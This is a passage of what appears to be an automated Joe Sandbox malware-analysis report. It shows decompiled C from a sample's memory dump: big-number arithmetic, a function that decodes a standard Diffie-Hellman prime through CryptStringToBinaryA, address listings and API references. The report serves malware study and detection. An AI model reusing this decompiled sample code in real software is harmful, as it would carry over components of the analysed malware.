									if( *((intOrPtr*)(_t474 + 4)) == _t486) {
										goto L128;
									}
									__eflags = _v32 - _t486;
									if(_v32 != _t486) {
										L44:
										_t592 = _a20;
										E003AA694(_a20);
										_v56 = E003AA715(_a20);
										_t475 = E003AA715(_a20);
										_t564 = E003AA715(_a20);
										_v48 = _t564;
										_t366 = E003AA715(_t592);
										__eflags = _v56;
										_v44 = _t366;
										if(_v56 == 0) {
											L118:
											E003AA6BB(_a20);
											goto L128;
										}
										__eflags = _t475;
										if(_t475 == 0) {
											goto L118;
										}
										__eflags = _t564;
										if(_t564 == 0) {
											goto L118;
										}
										__eflags = _t366;
										if(_t366 == 0) {
											goto L118;
										}
										_t532 = _a16;
										_t370 = E003A6518(_a16) & 0x8000001f;
										__eflags = _t370;
										if(_t370 < 0) {
											_t370 = (_t370 - 0x00000001 | 0xffffffe0) + 1;
											__eflags = _t370;
										}
										_t593 = 0x20;
										_t594 = _t593 - _t370;
										_t371 = E003AA920(_t532, _t564, _t532, _t594);
										_t609 = _t609 + 0xc;
										__eflags = _t371;
										if(_t371 == 0) {
											goto L118;
										} else {
											 *(_t564 + 0xc) =  *(_t564 + 0xc) & 0x00000000;
											_v156 = _t594 + 0x20;
											_t372 = E003AA920(_t532, _t475, _a8, _t594 + 0x20);
											_t609 = _t609 + 0xc;
											__eflags = _t372;
											if(_t372 == 0) {
												goto L118;
											}
											 *(_t475 + 0xc) =  *(_t475 + 0xc) & 0x00000000;
											__eflags = _v32;
											if(_v32 == 0) {
												L67:
												_t487 = _v48;
												_t596 =  *(_t487 + 4);
												_t373 =  *_t475;
												_t488 =  *_t487;
												_v128 = _v128 & 0x00000000;
												_t566 =  *(_t475 + 4) - _t596;
												_v140 = _t373 + _t566 * 4;
												_v132 =  *((intOrPtr*)(_t475 + 8)) - _t566;
												_v124 =  *(_t475 + 0x10) | 0x00000002;
												_t538 =  *(_t488 + _t596 * 4 - 4);
												_v60 = _t596;
												_v28 = _t566;
												_v136 = _t596;
												_v52 =  *(_t488 + _t596 * 4 - 4);
												__eflags = _t596 - 1;
												if(_t596 != 1) {
													_v64 =  *((intOrPtr*)(_t488 + _t596 * 4 - 8));
												} else {
													_v64 = _v64 & 0x00000000;
												}
												_v40 = _t373 +  *(_t475 + 4) * 4 - 4;
												_t492 = _v44;
												 *(_t492 + 0xc) =  *(_a16 + 0xc) ^  *(_a8 + 0xc);
												_t378 = _t566 + 1;
												__eflags = _t378 -  *((intOrPtr*)(_t492 + 8));
												if(_t378 >  *((intOrPtr*)(_t492 + 8))) {
													_t379 = E003A665B(_t378, _v44);
													_t596 = _v60;
													_t566 = _v28;
												} else {
													_t379 = _t492;
												}
												__eflags = _t379;
												if(_t379 == 0) {
													goto L118;
												} else {
													_t380 = _v44;
													 *((intOrPtr*)(_t380 + 4)) = _t566 - _v32;
													_t495 = _v56;
													_a16 =  *_t380 + _t566 * 4 - 4;
													_t383 = _t596 + 1;
													_v120 = _t383;
													__eflags = _t383 -  *((intOrPtr*)(_t495 + 8));
													if(_t383 >  *((intOrPtr*)(_t495 + 8))) {
														_t384 = E003A665B(_v120, _v56);
														_t596 = _v60;
														_t566 = _v28;
													} else {
														_t384 = _t495;
													}
													__eflags = _t384;
													if(_t384 == 0) {
														goto L118;
													} else {
														__eflags = _v32;
														if(_v32 == 0) {
															_t538 = _v48;
															_t448 = E003A687A( &_v140, _v48);
															__eflags = _t448;
															if(_t448 < 0) {
																_t449 = _v44;
																_t217 = _t449 + 4;
																 *_t217 =  *(_t449 + 4) - 1;
																__eflags =  *_t217;
															} else {
																_t538 =  *_v48;
																E003A70EC(_v140, _v140,  *_v48, _t596);
																 *_a16 = 1;
															}
														}
														_t385 = _v44;
														__eflags =  *(_t385 + 4);
														if( *(_t385 + 4) != 0) {
															_t223 =  &_a16;
															 *_t223 = _a16 - 4;
															__eflags =  *_t223;
														} else {
															 *(_t385 + 0xc) =  *(_t385 + 0xc) & 0x00000000;
														}
														_t569 = _t566 - 1;
														__eflags = _t569;
														if(_t569 <= 0) {
															L106:
															_t386 =  *(_t475 + 4);
															__eflags = _t386;
															if(_t386 <= 0) {
																L110:
																_t599 =  *(_a8 + 0xc);
																E003AAA38(_v156, _t475, _t538,  &_v108);
																_pop(_t486);
																__eflags = _v104;
																if(_v104 != 0) {
																	_v96 = _t599;
																}
																__eflags = _v32;
																if(_v32 == 0) {
																	L117:
																	E003AA6BB(_a20);
																	L43:
																	_t393 = _v12;
																	_push(_t393);
																	_push(_t393 + 4);
																	_push( &_v108);
																	L20:
																	_push( &_v108);
																	_t398 = E003ADC59(_a20, _t486, _t538, __eflags);
																	_t609 = _t609 + 0x10;
																	__eflags = _t398;
																	if(_t398 == 0) {
																		goto L128;
																	}
																	_t399 = E003AD3E7(_v36,  &_v88, _v16, 0, _v20);
																	_t609 = _t609 + 0xc;
																	__eflags = _t399;
																	if(_t399 == 0) {
																		goto L128;
																	}
																	_t540 = _v36;
																	_t601 =  &_v108;
																	_t400 = E003AD3E7(_v36,  &_v108, _v16, 1, _v20);
																	_t609 = _t609 + 0xc;
																	__eflags = _t400;
																	if(_t400 == 0) {
																		goto L128;
																	}
																	__eflags = _v24 - 1;
																	if(__eflags <= 0) {
																		L30:
																		_v8 = _v8 - 1;
																		_t401 = _v8;
																		asm("cdq");
																		_t541 = _t401 % _v24;
																		_t602 = 0;
																		_t571 = _t401 % _v24;
																		__eflags = _t571;
																		if(_t571 < 0) {
																			L32:
																			_t497 =  &_v88;
																			_t404 = E003AD41A(_v36,  &_v88, _v16, _t602, _v20);
																			_t609 = _t609 + 0xc;
																			while(1) {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					goto L128;
																				}
																				_t572 = 0;
																				__eflags = _v8;
																				if(__eflags >= 0) {
																					_t603 = 0;
																					__eflags = _v24;
																					if(__eflags <= 0) {
																						L122:
																						_t497 =  &_v108;
																						_t406 = E003AD41A(_v36,  &_v108, _v16, _t603, _v20);
																						_t609 = _t609 + 0xc;
																						__eflags = _t406;
																						if(__eflags == 0) {
																							goto L128;
																						}
																						_t404 = E003ADC59(_a20,  &_v108, _t541, __eflags,  &_v88,  &_v88,  &_v108, _v12);
																						_t609 = _t609 + 0x10;
																						continue;
																					} else {
																						goto L120;
																					}
																					while(1) {
																						L120:
																						_t412 = E003ADC59(_a20, _t497, _t541, __eflags,  &_v88,  &_v88,  &_v88, _v12);
																						_t609 = _t609 + 0x10;
																						__eflags = _t412;
																						if(_t412 == 0) {
																							goto L128;
																						}
																						_t413 = E003A691C(_a12, _t541, _v8);
																						_t572 = _t572 + 1;
																						_v8 = _v8 - 1;
																						_pop(_t497);
																						_t603 = _t413 + _t603 * 2;
																						__eflags = _t572 - _v24;
																						if(__eflags < 0) {
																							continue;
																						}
																						goto L122;
																					}
																					goto L128;
																				}
																				_t416 = E003ADECF(_a20, _t497, __eflags, _a4,  &_v88, _v12);
																				_t609 = _t609 + 0xc;
																				__eflags = _t416;
																				if(_t416 != 0) {
																					_v112 = 1;
																				}
																				goto L128;
																			}
																			goto L128;
																		} else {
																			goto L31;
																		}
																		do {
																			L31:
																			_t417 = E003A691C(_a12, _t541, _v8);
																			_v8 = _v8 - 1;
																			_t571 = _t571 - 1;
																			__eflags = _t571;
																			_t602 = _t417 + _t602 * 2;
																		} while (_t571 >= 0);
																		goto L32;
																	}
																	_t421 = E003ADC59(_a20, _t486, _t540, __eflags,  &_v88,  &_v108, _t601, _v12);
																	_t609 = _t609 + 0x10;
																	__eflags = _t421;
																	if(_t421 == 0) {
																		goto L128;
																	}
																	_t542 = _v36;
																	_t422 = E003AD3E7(_v36,  &_v88, _v16, 2, _v20);
																	_t609 = _t609 + 0xc;
																	__eflags = _t422;
																	if(_t422 == 0) {
																		goto L128;
																	}
																	_t573 = 3;
																	__eflags = _v20 - _t573;
																	if(__eflags <= 0) {
																		goto L30;
																	} else {
																		goto L27;
																	}
																	while(1) {
																		L27:
																		_t427 = E003ADC59(_a20, _t486, _t542, __eflags,  &_v88,  &_v108,  &_v88, _v12);
																		_t609 = _t609 + 0x10;
																		__eflags = _t427;
																		if(_t427 == 0) {
																			goto L128;
																		}
																		_t542 = _v36;
																		_t428 = E003AD3E7(_v36,  &_v88, _v16, _t573, _v20);
																		_t609 = _t609 + 0xc;
																		__eflags = _t428;
																		if(_t428 == 0) {
																			goto L128;
																		}
																		_t573 = _t573 + 1;
																		__eflags = _t573 - _v20;
																		if(__eflags < 0) {
																			continue;
																		}
																		goto L30;
																	}
																	goto L128;
																} else {
																	_t429 = _v44;
																	_t486 =  *(_t429 + 4);
																	__eflags = _t486;
																	if(_t486 <= 0) {
																		goto L117;
																	}
																	_t501 =  *_t429 + _t486 * 4 - 4;
																	while(1) {
																		_t538 =  *_t501;
																		_t486 = _t501 - 4;
																		__eflags =  *_t501;
																		if( *_t501 != 0) {
																			goto L117;
																		}
																		 *(_t429 + 4) =  *(_t429 + 4) - 1;
																		__eflags =  *(_t429 + 4);
																		if( *(_t429 + 4) > 0) {
																			continue;
																		}
																		goto L117;
																	}
																	goto L117;
																}
															}
															_t430 =  *_t475 + _t386 * 4 - 4;
															while(1) {
																_t503 =  *_t430;
																_t430 = _t430 - 4;
																__eflags = _t503;
																if(_t503 != 0) {
																	goto L110;
																}
																 *(_t475 + 4) =  *(_t475 + 4) - 1;
																__eflags =  *(_t475 + 4);
																if( *(_t475 + 4) > 0) {
																	continue;
																}
																goto L110;
															}
															goto L110;
														} else {
															_t432 = _a16 - _v40;
															__eflags = _t432;
															_v60 = _t569;
															_v148 = _t432;
															do {
																_t504 = _v40;
																_t433 =  *_t504;
																_t574 =  *((intOrPtr*)(_t504 - 4));
																__eflags =  *_t504 - _v52;
																if( *_t504 != _v52) {
																	_t434 = E003A6F02(_t433, _t574, _v52);
																	_v144 = _t574 - _t434 * _v52;
																	_a16 = _t434;
																	_t435 = _v64;
																	_t544 = _t435 & 0x0000ffff;
																	_v28 = _t434 & 0x0000ffff;
																	_t577 = _t434 >> 0x10;
																	_t436 = _t435 >> 0x10;
																	_t545 = _t544 * _v28;
																	_v152 = _t577;
																	_t437 = _t436 * _v152;
																	_t579 = _t436 * _v28;
																	_t512 = _t544 * _t577 + _t579;
																	_v28 = _t579;
																	__eflags = _t512 - _t579;
																	if(_t512 < _t579) {
																		_t437 = _t437 + 0x10000;
																		__eflags = _t437;
																	}
																	_t513 = _t512 << 0x10;
																	_t546 = _t545 + _t513;
																	_t438 = _t437 + (_t512 >> 0x10);
																	__eflags = _t546 - _t513;
																	if(_t546 < _t513) {
																		_t438 = _t438 + 1;
																		__eflags = _t438;
																	}
																	_t514 = _v144;
																	while(1) {
																		__eflags = _t438 - _t514;
																		if(__eflags < 0) {
																			break;
																		}
																		if(__eflags != 0) {
																			L96:
																			_t514 = _t514 + _v52;
																			_a16 = _a16 - 1;
																			__eflags = _t514 - _v52;
																			if(_t514 < _v52) {
																				break;
																			}
																			__eflags = _t546 - _v64;
																			if(_t546 < _v64) {
																				_t438 = _t438 - 1;
																				__eflags = _t438;
																			}
																			_t546 = _t546 - _v64;
																			__eflags = _t546;
																			continue;
																		}
																		_t583 = _v40;
																		__eflags = _t546 -  *((intOrPtr*)(_t583 - 8));
																		if(_t546 <=  *((intOrPtr*)(_t583 - 8))) {
																			break;
																		}
																		goto L96;
																	}
																	L101:
																	_t582 = _v48;
																	_t440 = E003A6BFB( *_v48,  *_v56, _t596);
																	_v140 = _v140 - 4;
																	 *((intOrPtr*)( *_v56 + _t596 * 4)) = _t440;
																	_t442 = E003A70EC(_v140, _v140,  *_v56, _v120);
																	__eflags = _t442;
																	if(_t442 == 0) {
																		L104:
																		_t443 = _v40;
																		goto L105;
																	}
																	_a16 = _a16 - 1;
																	_t446 = E003A6FFC( *_t582, _v140, _v140, _t596);
																	__eflags = _t446;
																	if(_t446 == 0) {
																		goto L104;
																	}
																	_t443 = _v40;
																	 *_t443 =  *_t443 + 1;
																	goto L105;
																}
																_a16 = _a16 | 0xffffffff;
																goto L101;
																L105:
																_t538 = _a16;
																 *(_t443 + _v148) = _a16;
																_t272 =  &_v60;
																 *_t272 = _v60 - 1;
																__eflags =  *_t272;
																_v40 = _t443 - 4;
															} while ( *_t272 != 0);
															goto L106;
														}
													}
												}
											}
											_t454 =  *((intOrPtr*)(_t564 + 4));
											_t525 =  *(_t475 + 4);
											__eflags = _t525 - _t454 + 1;
											if(_t525 > _t454 + 1) {
												_t584 = _t525 + 1;
												__eflags = _t525 + 1 -  *((intOrPtr*)(_t475 + 8));
												if(_t525 + 1 >  *((intOrPtr*)(_t475 + 8))) {
													_t455 = E003A665B(_t584, _t475);
												} else {
													_t455 = _t475;
												}
												__eflags = _t455;
												if(_t455 == 0) {
													goto L118;
												} else {
													 *( *_t475 +  *(_t475 + 4) * 4) =  *( *_t475 +  *(_t475 + 4) * 4) & 0x00000000;
													_t152 = _t475 + 4;
													 *_t152 =  *(_t475 + 4) + 1;
													__eflags =  *_t152;
													goto L67;
												}
											}
											_t457 = _t454 + 2;
											__eflags = _t457 -  *((intOrPtr*)(_t475 + 8));
											if(_t457 >  *((intOrPtr*)(_t475 + 8))) {
												_t458 = E003A665B(_t457, _t475);
												_t564 = _v48;
											} else {
												_t458 = _t475;
											}
											__eflags = _t458;
											if(_t458 == 0) {
												goto L118;
											} else {
												_t459 =  *(_t475 + 4);
												while(1) {
													__eflags = _t459 -  *((intOrPtr*)(_t564 + 4)) + 2;
													if(_t459 >=  *((intOrPtr*)(_t564 + 4)) + 2) {
														break;
													}
													 *( *_t475 + _t459 * 4) =  *( *_t475 + _t459 * 4) & 0x00000000;
													_t459 = _t459 + 1;
													__eflags = _t459;
												}
												 *(_t475 + 4) =  *((intOrPtr*)(_t564 + 4)) + 2;
												goto L67;
											}
										}
									}
									_t538 = _t474;
									_t465 = E003A687A(_t591, _t474);
									__eflags = _t465;
									if(_t465 >= 0) {
										goto L44;
									}
									_t467 = E003A669B(_t486,  &_v108, _t591);
									_pop(_t486);
									__eflags = _t467;
									if(__eflags == 0) {
										goto L128;
									}
									goto L43;
								}
								__eflags =  *(_t474 + 0x10) & 0x00000004;
								if(( *(_t474 + 0x10) & 0x00000004) == 0) {
									goto L39;
								}
								goto L38;
							}
							_t553 =  *_t591;
							__eflags =  *((intOrPtr*)(_t553 + _t357 * 4 - 4)) - _t486;
							if( *((intOrPtr*)(_t553 + _t357 * 4 - 4)) == _t486) {
								goto L128;
							}
							goto L36;
						}
						_t538 = _t474;
						__eflags = E003A687A(_t591, _t474);
						if(__eflags >= 0) {
							_t486 = 0;
							__eflags = 0;
							goto L34;
						}
						_push(_v12);
						_push(_t562);
						_push(_t591);
						goto L20;
					}
				}
			}


















































































































































    0x003ad481
    0x003ad48a
    0x003ad48e
    0x003ad499
    0x003ad49c
    0x003ad49f
    0x003ad4a2
    0x003ad4a5
    0x003ad4a8
    0x00000000
    0x003ad4aa
    0x003ad4b1
    0x003ad4b4
    0x003ad4b9
    0x003ad4bc
    0x003ad4be
    0x00000000
    0x003ad4c6
    0x003ad4d1
    0x003ad4d4
    0x003ad4d9
    0x003ad4de
    0x003ad4e1
    0x003ad4e3
    0x003adc49
    0x003adc4c
    0x00000000
    0x003ad4e9
    0x003ad4ee
    0x003ad4f3
    0x003ad4f6
    0x003ad4f8
    0x003adc22
    0x003adc25
    0x003adc2a
    0x003adc2e
    0x003adc38
    0x003adc40
    0x003adc46
    0x00000000
    0x003adc2e
    0x003ad4fe
    0x003ad501
    0x003ad506
    0x003ad511
    0x003ad516
    0x003ad521
    0x003ad524
    0x003ad531
    0x003ad534
    0x003ad534
    0x003ad53b
    0x003ad526
    0x003ad526
    0x003ad526
    0x003ad518
    0x003ad518
    0x003ad518
    0x003ad508
    0x003ad508
    0x003ad508
    0x003ad544
    0x003ad546
    0x003ad549
    0x003ad54c
    0x003ad54e
    0x003ad550
    0x003ad550
    0x003ad552
    0x003ad557
    0x003ad55a
    0x003ad561
    0x003ad568
    0x003ad56b
    0x003ad56d
    0x00000000
    0x003ad573
    0x003ad57f
    0x003ad585
    0x003ad588
    0x003ad58d
    0x003ad593
    0x003ad598
    0x003ad59a
    0x003ad59d
    0x003ad5a0
    0x003ad5a3
    0x003ad5a7
    0x003ad5aa
    0x003ad5b1
    0x003ad5b4
    0x003ad5c4
    0x003ad5c7
    0x003ad5ca
    0x003ad5cf
    0x003ad5d2
    0x003ad5d4
    0x00000000
    0x00000000
    0x003ad5da
    0x003ad5dd
    0x003ad5e0
    0x003ad5e2
    0x003ad5e5
    0x003ad72a
    0x003ad72a
    0x003ad72d
    0x003ad730
    0x003ad732
    0x003ad740
    0x003ad740
    0x003ad744
    0x003ad74c
    0x003ad74c
    0x003ad753
    0x003ad753
    0x003ad756
    0x00000000
    0x00000000
    0x003ad75c
    0x003ad75f
    0x003ad793
    0x003ad793
    0x003ad798
    0x003ad7a4
    0x003ad7ae
    0x003ad7b7
    0x003ad7bb
    0x003ad7be
    0x003ad7c3
    0x003ad7c7
    0x003ad7ca
    0x003adb83
    0x003adb86
    0x00000000
    0x003adb86
    0x003ad7d0
    0x003ad7d2
    0x00000000
    0x00000000
    0x003ad7d8
    0x003ad7da
    0x00000000
    0x00000000
    0x003ad7e0
    0x003ad7e2
    0x00000000
    0x00000000
    0x003ad7e8
    0x003ad7f0
    0x003ad7f0
    0x003ad7f5
    0x003ad7fb
    0x003ad7fb
    0x003ad7fb
    0x003ad7fe
    0x003ad7ff
    0x003ad804
    0x003ad809
    0x003ad80c
    0x003ad80e
    0x00000000
    0x003ad814
    0x003ad814
    0x003ad81f
    0x003ad826
    0x003ad82b
    0x003ad82e
    0x003ad830
    0x00000000
    0x00000000
    0x003ad836
    0x003ad83a
    0x003ad83e
    0x003ad8b5
    0x003ad8b5
    0x003ad8b8
    0x003ad8be
    0x003ad8c0
    0x003ad8c2
    0x003ad8c6
    0x003ad8cb
    0x003ad8d6
    0x003ad8df
    0x003ad8e2
    0x003ad8e6
    0x003ad8e9
    0x003ad8ec
    0x003ad8f2
    0x003ad8f5
    0x003ad8f8
    0x003ad904
    0x003ad8fa
    0x003ad8fa
    0x003ad8fa
    0x003ad911
    0x003ad91d
    0x003ad920
    0x003ad923
    0x003ad926
    0x003ad929
    0x003ad934
    0x003ad939
    0x003ad93c
    0x003ad92b
    0x003ad92b
    0x003ad92b
    0x003ad93f
    0x003ad941
    0x00000000
    0x003ad947
    0x003ad947
    0x003ad94f
    0x003ad954
    0x003ad95b
    0x003ad95e
    0x003ad961
    0x003ad964
    0x003ad967
    0x003ad973
    0x003ad978
    0x003ad97b
    0x003ad969
    0x003ad969
    0x003ad969
    0x003ad97e
    0x003ad980
    0x00000000
    0x003ad986
    0x003ad986
    0x003ad98a
    0x003ad98c
    0x003ad995
    0x003ad99a
    0x003ad99c
    0x003ad9bd
    0x003ad9c0
    0x003ad9c0
    0x003ad9c0
    0x003ad99e
    0x003ad9a1
    0x003ad9ac
    0x003ad9b5
    0x003ad9b5
    0x003ad99c
    0x003ad9c3
    0x003ad9c6
    0x003ad9ca
    0x003ad9d2
    0x003ad9d2
    0x003ad9d2
    0x003ad9cc
    0x003ad9cc
    0x003ad9cc
    0x003ad9d6
    0x003ad9d7
    0x003ad9d9
    0x003adb10
    0x003adb10
    0x003adb15
    0x003adb17
    0x003adb30
    0x003adb33
    0x003adb42
    0x003adb47
    0x003adb48
    0x003adb4b
    0x003adb4d
    0x003adb4d
    0x003adb50
    0x003adb53
    0x003adb76
    0x003adb79
    0x003ad782
    0x003ad782
    0x003ad785
    0x003ad789
    0x003ad78d
    0x003ad601
    0x003ad604
    0x003ad608
    0x003ad60d
    0x003ad610
    0x003ad612
    0x00000000
    0x00000000
    0x003ad626
    0x003ad62b
    0x003ad62e
    0x003ad630
    0x00000000
    0x00000000
    0x003ad639
    0x003ad641
    0x003ad644
    0x003ad649
    0x003ad64c
    0x003ad64e
    0x00000000
    0x00000000
    0x003ad654
    0x003ad658
    0x003ad6e7
    0x003ad6e7
    0x003ad6ea
    0x003ad6ed
    0x003ad6ee
    0x003ad6f1
    0x003ad6f3
    0x003ad6f5
    0x003ad6f7
    0x003ad70e
    0x003ad718
    0x003ad71b
    0x003ad720
    0x003adbf7
    0x003adbf7
    0x003adbf9
    0x00000000
    0x00000000
    0x003adbfb
    0x003adbfd
    0x003adc00
    0x003adb90
    0x003adb92
    0x003adb95
    0x003adbc7
    0x003adbd1
    0x003adbd4
    0x003adbd9
    0x003adbdc
    0x003adbde
    0x00000000
    0x00000000
    0x003adbef
    0x003adbf4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003adb97
    0x003adb97
    0x003adba3
    0x003adba8
    0x003adbab
    0x003adbad
    0x00000000
    0x00000000
    0x003adbb5
    0x003adbba
    0x003adbbb
    0x003adbbe
    0x003adbbf
    0x003adbc2
    0x003adbc5
    0x00000000
    0x00000000
    0x00000000
    0x003adbc5
    0x00000000
    0x003adb97
    0x003adc0f
    0x003adc14
    0x003adc17
    0x003adc19
    0x003adc1b
    0x003adc1b
    0x00000000
    0x003adc19
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003ad6f9
    0x003ad6f9
    0x003ad6ff
    0x003ad704
    0x003ad707
    0x003ad707
    0x003ad709
    0x003ad709
    0x00000000
    0x003ad6f9
    0x003ad66c
    0x003ad671
    0x003ad674
    0x003ad676
    0x00000000
    0x00000000
    0x003ad67f
    0x003ad68a
    0x003ad68f
    0x003ad692
    0x003ad694
    0x00000000
    0x00000000
    0x003ad69c
    0x003ad69d
    0x003ad6a0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003ad6a2
    0x003ad6a2
    0x003ad6b4
    0x003ad6b9
    0x003ad6bc
    0x003ad6be
    0x00000000
    0x00000000
    0x003ad6c7
    0x003ad6d1
    0x003ad6d6
    0x003ad6d9
    0x003ad6db
    0x00000000
    0x00000000
    0x003ad6e1
    0x003ad6e2
    0x003ad6e5
    0x00000000
    0x00000000
    0x00000000
    0x003ad6e5
    0x00000000
    0x003adb55
    0x003adb55
    0x003adb58
    0x003adb5b
    0x003adb5d
    0x00000000
    0x00000000
    0x003adb61
    0x003adb65
    0x003adb65
    0x003adb67
    0x003adb6a
    0x003adb6c
    0x00000000
    0x00000000
    0x003adb6e
    0x003adb71
    0x003adb74
    0x00000000
    0x00000000
    0x00000000
    0x003adb74
    0x00000000
    0x003adb65
    0x003adb53
    0x003adb1b
    0x003adb1f
    0x003adb1f
    0x003adb21
    0x003adb24
    0x003adb26
    0x00000000
    0x00000000
    0x003adb28
    0x003adb2b
    0x003adb2e
    0x00000000
    0x00000000
    0x00000000
    0x003adb2e
    0x00000000
    0x003ad9df
    0x003ad9e2
    0x003ad9e2
    0x003ad9e5
    0x003ad9e8
    0x003ad9ee
    0x003ad9ee
    0x003ad9f1
    0x003ad9f3
    0x003ad9f6
    0x003ad9f9
    0x003ada08
    0x003ada17
    0x003ada22
    0x003ada25
    0x003ada28
    0x003ada2b
    0x003ada2e
    0x003ada31
    0x003ada36
    0x003ada3d
    0x003ada45
    0x003ada4c
    0x003ada50
    0x003ada52
    0x003ada55
    0x003ada57
    0x003ada59
    0x003ada59
    0x003ada59
    0x003ada60
    0x003ada66
    0x003ada68
    0x003ada6a
    0x003ada6c
    0x003ada6e
    0x003ada6e
    0x003ada6e
    0x003ada6f
    0x003ada95
    0x003ada95
    0x003ada97
    0x00000000
    0x00000000
    0x003ada77
    0x003ada81
    0x003ada81
    0x003ada84
    0x003ada87
    0x003ada8a
    0x00000000
    0x00000000
    0x003ada8c
    0x003ada8f
    0x003ada91
    0x003ada91
    0x003ada91
    0x003ada92
    0x003ada92
    0x00000000
    0x003ada92
    0x003ada79
    0x003ada7c
    0x003ada7f
    0x00000000
    0x00000000
    0x00000000
    0x003ada7f
    0x003ada99
    0x003ada99
    0x003adaa7
    0x003adab1
    0x003adabb
    0x003adac8
    0x003adacf
    0x003adad1
    0x003adaf2
    0x003adaf2
    0x00000000
    0x003adaf2
    0x003adadb
    0x003adae1
    0x003adae7
    0x003adae9
    0x00000000
    0x00000000
    0x003adaeb
    0x003adaee
    0x00000000
    0x003adaee
    0x003ad9fb
    0x00000000
    0x003adaf5
    0x003adafb
    0x003adafe
    0x003adb04
    0x003adb04
    0x003adb04
    0x003adb07
    0x003adb07
    0x00000000
    0x003ad9ee
    0x003ad9d9
    0x003ad980
    0x003ad941
    0x003ad840
    0x003ad843
    0x003ad849
    0x003ad84b
    0x003ad88e
    0x003ad891
    0x003ad894
    0x003ad89c
    0x003ad896
    0x003ad896
    0x003ad896
    0x003ad8a1
    0x003ad8a3
    0x00000000
    0x003ad8a9
    0x003ad8ae
    0x003ad8b2
    0x003ad8b2
    0x003ad8b2
    0x00000000
    0x003ad8b2
    0x003ad8a3
    0x003ad84d
    0x003ad850
    0x003ad853
    0x003ad85d
    0x003ad862
    0x003ad855
    0x003ad855
    0x003ad855
    0x003ad865
    0x003ad867
    0x00000000
    0x003ad86d
    0x003ad86d
    0x003ad879
    0x003ad87f
    0x003ad881
    0x00000000
    0x00000000
    0x003ad874
    0x003ad878
    0x003ad878
    0x003ad878
    0x003ad889
    0x00000000
    0x003ad889
    0x003ad867
    0x003ad80e
    0x003ad761
    0x003ad765
    0x003ad76a
    0x003ad76c
    0x00000000
    0x00000000
    0x003ad773
    0x003ad779
    0x003ad77a
    0x003ad77c
    0x00000000
    0x00000000
    0x00000000
    0x003ad77c
    0x003ad746
    0x003ad74a
    0x00000000
    0x00000000
    0x00000000
    0x003ad74a
    0x003ad734
    0x003ad736
    0x003ad73a
    0x00000000
    0x00000000
    0x00000000
    0x003ad73a
    0x003ad5eb
    0x003ad5f4
    0x003ad5f6
    0x003ad728
    0x003ad728
    0x00000000
    0x003ad728
    0x003ad5fc
    0x003ad5ff
    0x003ad600
    0x00000000
    0x003ad600
    0x003ad56d

    APIs
    • memset.MSVCRT ref: 003AD588
      • Part of subcall function 003AA920: memset.MSVCRT ref: 003AAA03
      • Part of subcall function 003A665B: memset.MSVCRT ref: 003A6682
    • memset.MSVCRT ref: 003ADC38
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AF261, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28encryption
    C-Code - Quality: 87%
    			E003AF261(void* __ecx, BYTE* _a4) {
				int _v8;
				char* _t6;
				signed int _t8;
				char* _t12;
				char _t13;
				char* _t16;

				_t12 = "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF";
				_t6 = _t12;
				_v8 = 0x80;
				_t16 =  &(_t6[1]);
				do {
					_t13 =  *_t6;
					_t6 =  &(_t6[1]);
				} while (_t13 != 0);
				_t8 = CryptStringToBinaryA(_t12, _t6 - _t16, 4, _a4,  &_v8, 0, 0);
				asm("sbb eax, eax");
				return  ~_t8 & _v8;
			}









    0x003af265
    0x003af26a
    0x003af26d
    0x003af274
    0x003af277
    0x003af277
    0x003af279
    0x003af27a
    0x003af28f
    0x003af297
    0x003af29e

    APIs
    • CryptStringToBinaryA.CRYPT32(FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,00000004,00000000,00000080,00000000,00000000), ref: 003AF28F
    Strings
    • FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF, xrefs: 003AF265, 003AF28D, 003AF28E
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A39C0, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152Crypto
    C-Code - Quality: 15%
    			E003A39C0(intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _t53;
				unsigned char _t64;
